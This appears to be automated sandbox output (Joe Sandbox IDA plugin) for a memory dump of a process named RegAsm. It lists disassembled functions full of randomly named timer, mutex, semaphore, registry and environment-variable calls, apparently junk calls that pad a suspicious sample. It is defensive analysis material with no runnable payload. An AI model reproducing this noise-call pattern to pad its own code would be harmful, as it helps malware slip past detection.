SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
GetLastError.KERNEL32 ref: 0040F882
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
CloseHandle.KERNEL32(00000000), ref: 0040F8B6
SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
FindFirstFileA.KERNEL32(s_61jb01mx,?), ref: 0040F8E9
FindClose.KERNEL32(00000000), ref: 0040F8F0
LocalAlloc.KERNEL32(00000000,00000EF3), ref: 0040F8FE
LocalFree.KERNEL32(00000000), ref: 0040F905
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n9fcr403), ref: 0040F914
SetEvent.KERNEL32(00000000), ref: 0040F91D
ResetEvent.KERNEL32(00000000), ref: 0040F924
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_90ycp0c2), ref: 0040F933
CancelWaitableTimer.KERNEL32(00000000), ref: 0040F940
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ejqbin6h), ref: 0040F94B
CancelWaitableTimer.KERNEL32(00000000), ref: 0040F956
OutputDebugStringA.KERNEL32(t60isn899), ref: 0040F95D
SetEnvironmentVariableA.KERNEL32(jnbp7w8t,th9l7yzz), ref: 0040F96B
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_4mr1tbn2), ref: 0040F97C
OutputDebugStringA.KERNEL32(t1xpmw5to), ref: 0040F989
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F991
GetLastError.KERNEL32 ref: 0040F99B
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_ppfv76lo), ref: 0040F9E6
SetEvent.KERNEL32(00000000), ref: 0040F9EF
ResetEvent.KERNEL32(00000000), ref: 0040F9F6
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_i0q2h1lg), ref: 0040FA06
CancelWaitableTimer.KERNEL32(00000000), ref: 0040FA13
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,0000004E,00000000), ref: 0040FA1E
GetLastError.KERNEL32 ref: 0040FA26
CloseHandle.KERNEL32(00000000), ref: 0040FA29
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_sq7avrj1), ref: 0040FA38
GetLastError.KERNEL32 ref: 0040FA40
CancelWaitableTimer.KERNEL32(00000000), ref: 0040FA47
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLikw06o49), ref: 0040FA5A
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FA60
RegOpenKeyExA.ADVAPI32(80000001,regf217bk30,00000000,00020019,?), ref: 0040FA80
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_zuz2r5sz), ref: 0040FA8D
GetLastError.KERNEL32 ref: 0040FA91
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FA98
RegOpenKeyExA.ADVAPI32(80000001,regfbk5xbk3,00000000,00020019,?), ref: 0040FAB7
LocalAlloc.KERNEL32(00000000,00000988), ref: 0040FAC0
LocalFree.KERNEL32(00000000), ref: 0040FAC7
RegOpenKeyExA.ADVAPI32(80000001,regzrv2ygo6,00000000,00020019,?), ref: 0040FAE2
GetLastError.KERNEL32 ref: 0040FAE7
FindFirstFileA.KERNEL32(s_wypnk40k,?), ref: 0040FAFA
FindClose.KERNEL32(00000000), ref: 0040FB01
CreateMutexA.KERNEL32(00000002,00000002,MTXbuj0t1o5), ref: 0040FB0E
ReleaseMutex.KERNEL32(00000000), ref: 0040FB19
SetEnvironmentVariableA.KERNEL32(uyfrlhcm,tdn2hc46), ref: 0040FB2B
LocalFree.KERNEL32(00410AB3), ref: 0040FB44

Strings

WTMR_i0q2h1lg, xrefs: 0040F9FC
t1xpmw5to, xrefs: 0040F982
regfbk5xbk3, xrefs: 0040FAAD
xjah9ors, xrefs: 0040F8BC
t45511ik9, xrefs: 0040F80A
tdn2hc46, xrefs: 0040FB21
uyfrlhcm, xrefs: 0040FB26
MTX5u8ptwy0, xrefs: 0040F83A
regzrv2ygo6, xrefs: 0040FAD8
regnzv4wvxn, xrefs: 0040F7C0
wem6yeez, xrefs: 0040F8C1
WTMR_sq7avrj1, xrefs: 0040FA2F
wfy3i05h, xrefs: 0040F850
th9l7yzz, xrefs: 0040F961
t1pi8p487, xrefs: 0040F869
ev_ppfv76lo, xrefs: 0040F9DA
XMLikw06o49, xrefs: 0040FA51
regf217bk30, xrefs: 0040FA76
WTMR_fgohzvee, xrefs: 0040F870
MTXbuj0t1o5, xrefs: 0040FB07
SMPHR_zuz2r5sz, xrefs: 0040FA82
WTMR_ejqbin6h, xrefs: 0040F942
t60isn899, xrefs: 0040F958
jnbp7w8t, xrefs: 0040F966
regr3z819eq, xrefs: 0040F8A5
ev_v4tqtxno, xrefs: 0040F7D0
ttorgxv5m, xrefs: 0040F811
XMLf91r4xcv, xrefs: 0040F81E
SMPHR_4mr1tbn2, xrefs: 0040F971
ev_n9fcr403, xrefs: 0040F90B
WTMR_90ycp0c2, xrefs: 0040F92A
WTMR_8zhp33zt, xrefs: 0040F7EF
s_wypnk40k, xrefs: 0040FAF5
s_61jb01mx, xrefs: 0040F8E4
nhy1vzmm, xrefs: 0040F855

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$TimerWaitable$Event$Semaphore$ErrorLastLocal$CancelRelease$Open$CloseDebugEnvironmentFileFindFreeMutexOutputStringVariable$AllocReset$FirstHandleMapping
String ID: MTX5u8ptwy0$MTXbuj0t1o5$SMPHR_4mr1tbn2$SMPHR_zuz2r5sz$WTMR_8zhp33zt$WTMR_90ycp0c2$WTMR_ejqbin6h$WTMR_fgohzvee$WTMR_i0q2h1lg$WTMR_sq7avrj1$XMLf91r4xcv$XMLikw06o49$ev_n9fcr403$ev_ppfv76lo$ev_v4tqtxno$jnbp7w8t$nhy1vzmm$regf217bk30$regfbk5xbk3$regnzv4wvxn$regr3z819eq$regzrv2ygo6$s_61jb01mx$s_wypnk40k$t1pi8p487$t1xpmw5to$t45511ik9$t60isn899$tdn2hc46$th9l7yzz$ttorgxv5m$uyfrlhcm$wem6yeez$wfy3i05h$xjah9ors
API String ID: 1810849218-2433077723
Opcode ID: dc5837256421c257d12c5487682bdd5d7188aed268ff863dad54e58b4f017f03
Instruction ID: ea02b96465bf7696cd3440a59384d462777eba736ecbe720139a01a83ec10eff
Opcode Fuzzy Hash: dc5837256421c257d12c5487682bdd5d7188aed268ff863dad54e58b4f017f03
Instruction Fuzzy Hash: A8A18335E80354BBD7206BA19D4EFDE3E68AB89B51F114032F705F65E0CBBC59808A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC1E Relevance: 175.3, APIs: 63, Strings: 37, Instructions: 303timesynchronizationregistryCOMMON

Download Yara Rule

APIs

CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLdjh5epvm), ref: 0040FC3D
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FC46
RegOpenKeyExA.ADVAPI32(80000001,reg1lftjymb,00000000,00020019,?), ref: 0040FC66
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000E35,00000000), ref: 0040FC74
SetEnvironmentVariableA.KERNEL32(qhgw1ab5,fob2sj9z), ref: 0040FC8C
CloseHandle.KERNEL32(00000000), ref: 0040FC8F
RegOpenKeyExA.ADVAPI32(80000001,regwvuepiu9,00000000,00020019,?), ref: 0040FCAA
LocalAlloc.KERNEL32(00000000,00000903), ref: 0040FCB3
RegOpenKeyExA.ADVAPI32(80000001,reg4rnlrcg8,00000000,00020019,?), ref: 0040FCD0
LocalFree.KERNEL32(00000000), ref: 0040FCD3
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_26mp3425), ref: 0040FCE4
SetEvent.KERNEL32(00000000), ref: 0040FCED
ResetEvent.KERNEL32(00000000), ref: 0040FCF4
CreateMutexA.KERNEL32(00000000,00000000,MTX34yeuucm), ref: 0040FD01
ReleaseMutex.KERNEL32(00000000), ref: 0040FD0C
OutputDebugStringA.KERNEL32(tbbtvgtkq), ref: 0040FD17
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ggohtyic), ref: 0040FD25
SetEnvironmentVariableA.KERNEL32(j5a1a2f9,r6nn23zx), ref: 0040FD37
CancelWaitableTimer.KERNEL32(00000000), ref: 0040FD44
GetLastError.KERNEL32 ref: 0040FD4C
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_6qtqds15), ref: 0040FD6D
CancelWaitableTimer.KERNEL32(00000000), ref: 0040FD78
OutputDebugStringA.KERNEL32(tgnyhn0oi), ref: 0040FD83
SetEnvironmentVariableA.KERNEL32(lyaei9tw,bxo6mn3y), ref: 0040FD99
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML7xheqgqb), ref: 0040FDA6
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FDB1
OutputDebugStringA.KERNEL32(txmor20l9), ref: 0040FDBC
FindFirstFileA.KERNEL32(s_c8bvephs,?), ref: 0040FDCE
FindClose.KERNEL32(00000000), ref: 0040FDD5
CreateMutexA.KERNEL32(00000000,00000000,MTXtn7gp4y9), ref: 0040FDE4
ReleaseMutex.KERNEL32(00000000), ref: 0040FDEF
SetEnvironmentVariableA.KERNEL32(tfcibijy,opmncyih), ref: 0040FE01
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_k6twxvbe), ref: 0040FE0E
SetEvent.KERNEL32(00000000), ref: 0040FE17
ResetEvent.KERNEL32(00000000), ref: 0040FE1E
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_feehg3ui), ref: 0040FE2F
GetLastError.KERNEL32 ref: 0040FE37
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FE3E
RegOpenKeyExA.ADVAPI32(80000001,regfzrc44xo,00000000,00020019,?), ref: 0040FE5D
OutputDebugStringA.KERNEL32(t4tbns3gr), ref: 0040FE6A
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_u9fx75f5), ref: 0040FEA7
SetEvent.KERNEL32(00000000), ref: 0040FEB0
ResetEvent.KERNEL32(00000000), ref: 0040FEB7
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLpyjh0tf2), ref: 0040FECA
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FED4
LocalAlloc.KERNEL32(00000000,000002E2), ref: 0040FEE0
OutputDebugStringA.KERNEL32(td0wujnth), ref: 0040FEED
LocalFree.KERNEL32(00000000), ref: 0040FEF4
RegOpenKeyExA.ADVAPI32(80000001,regkfn324ta,00000000,00020019,?), ref: 0040FF0F
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_3j4hshlg), ref: 0040FF20
GetLastError.KERNEL32 ref: 0040FF28
CancelWaitableTimer.KERNEL32(00000000), ref: 0040FF2F
GetLastError.KERNEL32 ref: 0040FF35
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ytpu5f65), ref: 0040FF42
OutputDebugStringA.KERNEL32(t01toqzbx), ref: 0040FF4F
CancelWaitableTimer.KERNEL32(00000000), ref: 0040FF56
GetLastError.KERNEL32 ref: 0040FF5C
CreateMutexA.KERNEL32(00000000,00000000,MTX45e7ahhl), ref: 0040FF67
ReleaseMutex.KERNEL32(00000000), ref: 0040FF72
GetLastError.KERNEL32 ref: 0040FF7A
SetEnvironmentVariableA.KERNEL32(4oplm0pt,96hl8dlz), ref: 0040FF86
CloseHandle.KERNEL32(00000000), ref: 0040FFBC
CloseHandle.KERNEL32(00000000), ref: 0040FFDA

Strings

WTMR_ggohtyic, xrefs: 0040FD1D
txmor20l9, xrefs: 0040FDB7
tgnyhn0oi, xrefs: 0040FD7E
t01toqzbx, xrefs: 0040FF48
MTXtn7gp4y9, xrefs: 0040FDDB
ev_k6twxvbe, xrefs: 0040FE03
reg1lftjymb, xrefs: 0040FC5C
XML7xheqgqb, xrefs: 0040FD9B
r6nn23zx, xrefs: 0040FD2B
bxo6mn3y, xrefs: 0040FD8F
reg4rnlrcg8, xrefs: 0040FCC6
WTMR_ytpu5f65, xrefs: 0040FF39
t4tbns3gr, xrefs: 0040FE65
ev_26mp3425, xrefs: 0040FCD9
regwvuepiu9, xrefs: 0040FCA0
WTMR_6qtqds15, xrefs: 0040FD64
opmncyih, xrefs: 0040FDF7
tfcibijy, xrefs: 0040FDFC
regfzrc44xo, xrefs: 0040FE53
96hl8dlz, xrefs: 0040FF7C
qhgw1ab5, xrefs: 0040FC87
MTX34yeuucm, xrefs: 0040FCFA
fob2sj9z, xrefs: 0040FC82
j5a1a2f9, xrefs: 0040FD30
4K@, xrefs: 0040FFE0, 0040FFAD
s_c8bvephs, xrefs: 0040FDC9
regkfn324ta, xrefs: 0040FF05
WTMR_3j4hshlg, xrefs: 0040FF17
lyaei9tw, xrefs: 0040FD94
tbbtvgtkq, xrefs: 0040FD12
XMLpyjh0tf2, xrefs: 0040FEBD
MTX45e7ahhl, xrefs: 0040FF5E
SMPHR_feehg3ui, xrefs: 0040FE24
ev_u9fx75f5, xrefs: 0040FE9D
4oplm0pt, xrefs: 0040FF81
td0wujnth, xrefs: 0040FEE6
XMLdjh5epvm, xrefs: 0040FC2A

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$Event$SemaphoreTimerWaitable$Release$DebugErrorLastMutexOutputString$EnvironmentOpenVariable$CancelCloseLocal$HandleReset$AllocFileFindFree$FirstMapping
String ID: 4K@$4oplm0pt$96hl8dlz$MTX34yeuucm$MTX45e7ahhl$MTXtn7gp4y9$SMPHR_feehg3ui$WTMR_3j4hshlg$WTMR_6qtqds15$WTMR_ggohtyic$WTMR_ytpu5f65$XML7xheqgqb$XMLdjh5epvm$XMLpyjh0tf2$bxo6mn3y$ev_26mp3425$ev_k6twxvbe$ev_u9fx75f5$fob2sj9z$j5a1a2f9$lyaei9tw$opmncyih$qhgw1ab5$r6nn23zx$reg1lftjymb$reg4rnlrcg8$regfzrc44xo$regkfn324ta$regwvuepiu9$s_c8bvephs$t01toqzbx$t4tbns3gr$tbbtvgtkq$td0wujnth$tfcibijy$tgnyhn0oi$txmor20l9
API String ID: 258851958-1190674230
Opcode ID: 5e399cd1c6cee180986081d77b4f727af80630b1fe4e92a825b41088928d9f12
Instruction ID: b5ef87629e666c089a08aaa31d10835735c35b7037017a4a07802c9f129a8800
Opcode Fuzzy Hash: 5e399cd1c6cee180986081d77b4f727af80630b1fe4e92a825b41088928d9f12
Instruction Fuzzy Hash: 27915175A50394BFD7206BB09C4DFEE3E68EB49B41F114032F705E65E0D7B849818AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040E83D Relevance: 121.0, APIs: 44, Strings: 25, Instructions: 267timememorysynchronizationCOMMON

Download Yara Rule

APIs

CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ym6bmffb), ref: 0040E85E
CancelWaitableTimer.KERNEL32(00000000), ref: 0040E871
OutputDebugStringA.KERNEL32(tag0xnf48), ref: 0040E878
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLaxdt8ke2), ref: 0040E885
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E890
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_jeyw99e1), ref: 0040E89F
OutputDebugStringA.KERNEL32(tfo0sbavo), ref: 0040E8A8
CancelWaitableTimer.KERNEL32(00000000), ref: 0040E8AB
OutputDebugStringA.KERNEL32(t3ewm5odv), ref: 0040E8B2
LocalAlloc.KERNEL32(00000000,00000333), ref: 0040E8BC
RegOpenKeyExA.ADVAPI32(80000001,regpgrampmo,00000000,00020019,?), ref: 0040E8D8
LocalFree.KERNEL32(00000000), ref: 0040E8DF
CreateMutexA.KERNEL32(00000000,00000000,MTXyvemg4hm), ref: 0040E8EC
SetEnvironmentVariableA.KERNEL32(03o1p8od,99kxwiit), ref: 0040E902
ReleaseMutex.KERNEL32(00000000), ref: 0040E909
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E931
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_4qsx3i2j), ref: 0040E94F
RegOpenKeyExA.ADVAPI32(80000001,reggy7bmue0,00000000,00020019,?), ref: 0040E96C
CancelWaitableTimer.KERNEL32(00000000), ref: 0040E977
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_wn3dccey), ref: 0040E988
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E992
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_elzlvdxb), ref: 0040E9A1
SetEvent.KERNEL32(00000000), ref: 0040E9AA
ResetEvent.KERNEL32(00000000), ref: 0040E9B1
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00001127,00000000), ref: 0040E9C5
OutputDebugStringA.KERNEL32(to2rpa6aq), ref: 0040E9D2
CloseHandle.KERNEL32(00000000), ref: 0040E9D9
OutputDebugStringA.KERNEL32(tlsbgjkes), ref: 0040E9E4
SetEnvironmentVariableA.KERNEL32(q2zrqrlx,e3abpbr1), ref: 0040E9F4
FindFirstFileA.KERNEL32(s_a3f8hc8a,?), ref: 0040EA06
FindClose.KERNEL32(00000000), ref: 0040EA0D
LocalAlloc.KERNEL32(00000000,00000A07), ref: 0040EA1A
SetEnvironmentVariableA.KERNEL32(i4aw58sr,5sbkcc11), ref: 0040EA2C
LocalFree.KERNEL32(00000000), ref: 0040EA33
GetLastError.KERNEL32 ref: 0040EA39
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_oo77qao9), ref: 0040EA49
CancelWaitableTimer.KERNEL32(00000000), ref: 0040EA50
OutputDebugStringA.KERNEL32(tpbqi4vp3), ref: 0040EA5B
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLuyums7pi), ref: 0040EA6A
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EA74
CreateMutexA.KERNEL32(00000000,00000000,MTXztwi3tu3), ref: 0040EA81
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040EAA6
LocalFree.KERNEL32(00000000), ref: 0040EB4E
LocalFree.KERNEL32(00000000), ref: 0040EB6D

Strings

WTMR_oo77qao9, xrefs: 0040EA3F
q2zrqrlx, xrefs: 0040E9EF
tlsbgjkes, xrefs: 0040E9DF
99kxwiit, xrefs: 0040E8F8
s_a3f8hc8a, xrefs: 0040EA01
MTXyvemg4hm, xrefs: 0040E8E5
WTMR_jeyw99e1, xrefs: 0040E896
SMPHR_wn3dccey, xrefs: 0040E97D
regpgrampmo, xrefs: 0040E8CE
i4aw58sr, xrefs: 0040EA25
WTMR_ym6bmffb, xrefs: 0040E84F
5sbkcc11, xrefs: 0040EA20
XMLuyums7pi, xrefs: 0040EA61
to2rpa6aq, xrefs: 0040E9CB
tfo0sbavo, xrefs: 0040E8A1
tpbqi4vp3, xrefs: 0040EA56
XMLaxdt8ke2, xrefs: 0040E87A
tag0xnf48, xrefs: 0040E873
03o1p8od, xrefs: 0040E8FD
reggy7bmue0, xrefs: 0040E962
e3abpbr1, xrefs: 0040E9EA
MTXztwi3tu3, xrefs: 0040EA7A
WTMR_4qsx3i2j, xrefs: 0040E93D
t3ewm5odv, xrefs: 0040E8AD
ev_elzlvdxb, xrefs: 0040E998

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$LocalTimerWaitable$DebugOutputSemaphoreString$AllocCancelFreeRelease$EnvironmentEventMutexVariable$CloseFileFindOpen$ErrorFirstHandleLastMappingReset
String ID: 03o1p8od$5sbkcc11$99kxwiit$MTXyvemg4hm$MTXztwi3tu3$SMPHR_wn3dccey$WTMR_4qsx3i2j$WTMR_jeyw99e1$WTMR_oo77qao9$WTMR_ym6bmffb$XMLaxdt8ke2$XMLuyums7pi$e3abpbr1$ev_elzlvdxb$i4aw58sr$q2zrqrlx$reggy7bmue0$regpgrampmo$s_a3f8hc8a$t3ewm5odv$tag0xnf48$tfo0sbavo$tlsbgjkes$to2rpa6aq$tpbqi4vp3
API String ID: 3098530101-86876278
Opcode ID: 8f42bc9d3bfd7387945d10fdec95ad738a3fd42ba349e5e0039e0024b0c3f244
Instruction ID: 7411fb536b031ab9d6539a02e1e197cb57a3909891f35cdd5ab6b52a7c060eb1
Opcode Fuzzy Hash: 8f42bc9d3bfd7387945d10fdec95ad738a3fd42ba349e5e0039e0024b0c3f244
Instruction Fuzzy Hash: 5B916032E40214AFD7209FA1DC49FDE7F78EB4C751F118426F705A75E0CAB899818BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040F23A Relevance: 117.5, APIs: 47, Strings: 20, Instructions: 231timesynchronizationregistryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00411AA0,00000000,00000000,00000000), ref: 0040F257
lstrlenA.KERNEL32(00000000), ref: 0040F25C
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_m3dn2s7y), ref: 0040F299
SetEvent.KERNEL32(00000000), ref: 0040F2A2
ResetEvent.KERNEL32(00000000), ref: 0040F2A9
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00001073,00000000), ref: 0040F2BD
GetLastError.KERNEL32(?,0040B89F), ref: 0040F2C5
CloseHandle.KERNEL32(00000000), ref: 0040F2CC
OutputDebugStringA.KERNEL32(tfr31hduf), ref: 0040F2D7
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_01xouty6), ref: 0040F2EC
CancelWaitableTimer.KERNEL32(00000000), ref: 0040F2EF
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_omszadh6), ref: 0040F2FE
RegOpenKeyExA.ADVAPI32(80000001,regmklpuiuh,00000000,00020019,?), ref: 0040F317
CancelWaitableTimer.KERNEL32(00000000), ref: 0040F322
RegOpenKeyExA.ADVAPI32(80000001,regd30csegr,00000000,00020019,?), ref: 0040F33F
FindFirstFileA.KERNEL32(s_ybyfhnc7,?), ref: 0040F351
FindClose.KERNEL32(00000000), ref: 0040F358
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLjf3atpf3), ref: 0040F36F
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F376
GetLastError.KERNEL32 ref: 0040F37C
LocalAlloc.KERNEL32(00000000,0000006A), ref: 0040F386
LocalFree.KERNEL32(00000000), ref: 0040F38D
CreateMutexA.KERNEL32(00000000,00000000,MTX2vorh5pk), ref: 0040F39C
ReleaseMutex.KERNEL32(00000000), ref: 0040F3A7
OutputDebugStringA.KERNEL32(thiv6nw54), ref: 0040F3B2
SetEnvironmentVariableA.KERNEL32(nn30atpg,upz187bz), ref: 0040F3C4
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLn4nxhm09), ref: 0040F410
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F416
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_kvicewx4), ref: 0040F425
SetEvent.KERNEL32(00000000), ref: 0040F42E
ResetEvent.KERNEL32(00000000), ref: 0040F435
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,000007D8,00000000), ref: 0040F447
CloseHandle.KERNEL32(00000000), ref: 0040F44E
GetLastError.KERNEL32 ref: 0040F45A
CreateMutexA.KERNEL32(00000000,00000000,MTXmqv692pu), ref: 0040F465
GetLastError.KERNEL32 ref: 0040F471
ReleaseMutex.KERNEL32(00000000), ref: 0040F474
FindFirstFileA.KERNEL32(s_wfr1hzvf,?), ref: 0040F486
FindClose.KERNEL32(00000000), ref: 0040F48D
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ny9sufs2), ref: 0040F49C
GetLastError.KERNEL32 ref: 0040F4A4
CancelWaitableTimer.KERNEL32(00000000), ref: 0040F4A7
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_blz1tv5v), ref: 0040F4B8
GetLastError.KERNEL32 ref: 0040F4C0
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F4C7
SetEnvironmentVariableA.KERNEL32(sfvxofx6,2c6c0jaa), ref: 0040F4DB
GlobalFree.KERNEL32(0040B89F), ref: 0040F4E4

Strings

MTX2vorh5pk, xrefs: 0040F393
WTMR_ny9sufs2, xrefs: 0040F493
MTXmqv692pu, xrefs: 0040F45C
thiv6nw54, xrefs: 0040F3AD
nn30atpg, xrefs: 0040F3BF
tfr31hduf, xrefs: 0040F2D2
WTMR_01xouty6, xrefs: 0040F2E3
sfvxofx6, xrefs: 0040F4D6
upz187bz, xrefs: 0040F3BA
regd30csegr, xrefs: 0040F335
2c6c0jaa, xrefs: 0040F4D1
SMPHR_blz1tv5v, xrefs: 0040F4AD
s_ybyfhnc7, xrefs: 0040F34C
WTMR_omszadh6, xrefs: 0040F2F5
XMLn4nxhm09, xrefs: 0040F405
ev_m3dn2s7y, xrefs: 0040F28E
regmklpuiuh, xrefs: 0040F30D
s_wfr1hzvf, xrefs: 0040F481
ev_kvicewx4, xrefs: 0040F41C
XMLjf3atpf3, xrefs: 0040F364

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$ErrorEventLastSemaphoreTimerWaitable$Release$CloseFileFindMutex$Cancel$DebugEnvironmentFirstFreeHandleLocalMappingOpenOutputResetStringVariablelstrlen$AllocGlobal
String ID: 2c6c0jaa$MTX2vorh5pk$MTXmqv692pu$SMPHR_blz1tv5v$WTMR_01xouty6$WTMR_ny9sufs2$WTMR_omszadh6$XMLjf3atpf3$XMLn4nxhm09$ev_kvicewx4$ev_m3dn2s7y$nn30atpg$regd30csegr$regmklpuiuh$s_wfr1hzvf$s_ybyfhnc7$sfvxofx6$tfr31hduf$thiv6nw54$upz187bz
API String ID: 839085604-341165634
Opcode ID: 3c95cc083e1e783ef4ce34f62c9194c1c4f456d8505e9daa25524d6dad1f110c
Instruction ID: 2ce30f1b42d509e84a1deb79b5eca7e45972eead5cf6da7637876a843b31e3f2
Opcode Fuzzy Hash: 3c95cc083e1e783ef4ce34f62c9194c1c4f456d8505e9daa25524d6dad1f110c
Instruction Fuzzy Hash: 89719431F40344BBE7202BB09C4DFDA3E68EB8CB51F154136FB05E65E0CAB849848A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E179 Relevance: 66.6, APIs: 24, Strings: 14, Instructions: 129registrysynchronizationtimeCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,ev_y69yttl7,00000000,00000000,00000000), ref: 0040E193
SetEvent.KERNEL32(00000000), ref: 0040E19C
ResetEvent.KERNEL32(00000000), ref: 0040E1A3
CreateMutexA.KERNEL32(00000000,00000000,MTX3t1mxx1o), ref: 0040E1B0
ReleaseMutex.KERNEL32(00000000), ref: 0040E1C1
GetLastError.KERNEL32 ref: 0040E1C7
RegOpenKeyExA.ADVAPI32(80000001,regk8hftcvg,00000000,00020019,?), ref: 0040E1E3
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_k80jkq3z), ref: 0040E1ED
RegOpenKeyExA.ADVAPI32(80000001,regkst75e0p,00000000,00020019,?), ref: 0040E209
CancelWaitableTimer.KERNEL32(00000000), ref: 0040E20C
FindFirstFileA.KERNEL32(s_kkyiaenp,?), ref: 0040E21E
FindClose.KERNEL32(00000000), ref: 0040E225
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLzpeebx01), ref: 0040E23A
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E247
RegOpenKeyExA.ADVAPI32(80000001,regupf760yl,00000000,00020019,?), ref: 0040E25E
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_g3v549yp), ref: 0040E26B
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E272
OutputDebugStringA.KERNEL32(t0bddrwll), ref: 0040E283
RegOpenKeyExA.ADVAPI32(80000001,regc448p6el,00000000,00020019,?), ref: 0040E29C
LocalAlloc.KERNEL32(00000000,00000994), ref: 0040E2A6
OutputDebugStringA.KERNEL32(t87ox2vav), ref: 0040E2B3
LocalFree.KERNEL32(00000000), ref: 0040E2B6
SetEnvironmentVariableA.KERNEL32(87mu9ra2,fte7n198), ref: 0040E2C6
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00001082,00000000), ref: 0040E2D8

Strings

SMPHR_g3v549yp, xrefs: 0040E260
87mu9ra2, xrefs: 0040E2C1
regc448p6el, xrefs: 0040E292
s_kkyiaenp, xrefs: 0040E219
regkst75e0p, xrefs: 0040E1FF
ev_y69yttl7, xrefs: 0040E185
